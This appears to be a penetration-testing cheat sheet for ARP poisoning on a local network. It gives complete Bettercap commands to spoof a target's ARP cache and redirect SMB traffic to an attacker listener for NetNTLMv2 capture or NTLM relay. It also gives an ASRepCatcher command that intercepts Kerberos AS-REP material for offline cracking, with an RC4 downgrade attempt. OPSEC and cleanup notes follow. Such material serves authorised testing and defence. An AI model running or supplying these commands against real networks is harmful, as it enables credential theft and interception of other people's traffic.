Skip to content

ARP Poisoning

Poison a target host's IPv4 ARP cache to intercept traffic for a server or gateway: NetNTLMv2 capture / relay, Kerberos interception, or unencrypted traffic.

Quick start (Bettercap)

Run Bettercap on the same L2 segment / VLAN as the target host. Set <next_hop_ip> to the server's IP if on the same subnet, otherwise the target host's gateway.

Action Command
Start Bettercap sudo bettercap -iface <iface>
Target host set arp.spoof.targets <target_ip>
Impersonate server / gateway set arp.spoof.spoofed <next_hop_ip>
Limit poisoning to selected next hop set arp.spoof.internal false
Poison target host only set arp.spoof.fullduplex false
Forward remaining traffic set arp.spoof.forwarding true

Configure the listener and redirection before arp.spoof on. Poisoning alone does not redirect connections to a local listener.

NTLM capture / relay

Start Responder's SMB listener for capture, or ntlmrelayx for relay. Disable Responder's competing SMB/HTTP servers when relaying.

Inside Bettercap, redirect <smb_server_ip>:445 to <attacker_ip>:445 using any.proxy:

set any.proxy.iface <iface>
set any.proxy.protocol TCP
set any.proxy.src_address <smb_server_ip>
set any.proxy.src_port 445
set any.proxy.dst_address <attacker_ip>
set any.proxy.dst_port 445
any.proxy on
arp.spoof on

any.proxy.src_address is the original destination server. Set the relay destination separately in ntlmrelayx.

Outcome Requirements / next step
Capture NetNTLMv2 Save challenge-response material for offline cracking; it cannot be used for pass-the-hash or replayed later.
Relay NTLM Forward live authentication to a compatible relay target; access depends on account permissions.
  • Requires new NTLM authentication; poisoning does not trigger it or force Kerberos fallback.
  • PCredz extracts credentials from visible traffic or saved captures.

Kerberos interception (ASRepCatcher)

ASRepCatcher intercepts AS-REP material for offline cracking, even with preauthentication enabled. Requires a Kerberos AS exchange during interception.

Set <next_hop_ip> to the DC's IP if on the same subnet, otherwise the target host's gateway.

Action Command
Intercept AS requests sudo ASRepCatcher relay -iface <iface> -gw <next_hop_ip> -dc <dc_ip> -t <target_ip> -outfile asrep.hashes
Stop poisoning after an AS-REP Add --stop-spoofing
  • Uses built-in ARP poisoning; stop Bettercap poisoning/redirection first.
  • Attempts an RC4 downgrade if target host, domain, and account encryption settings permit it.
  • Standard AS-REP roasting requires preauthentication disabled.

Notes / OPSEC

  • Scope: Specify targets; defaults can cover the subnet. Gateway spoofing can affect other routed traffic from those hosts.
  • Capture direction: One-way poisoning without redirection may miss server replies.
  • Controls: Dynamic ARP Inspection / enforced IP-MAC bindings can block poisoning; validated TLS protects application traffic.
  • Relay protections: Required SMB signing, LDAP signing, and channel binding / EPA still block their respective relay paths.
  • Bettercap cleanup: arp.spoof off, then any.proxy off. Keep arp.spoof.skip_restore at false for ARP restoration; verify connectivity.
  • ASRepCatcher cleanup: Ctrl+C; verify restored firewall rules, forwarding, ARP mappings, and connectivity.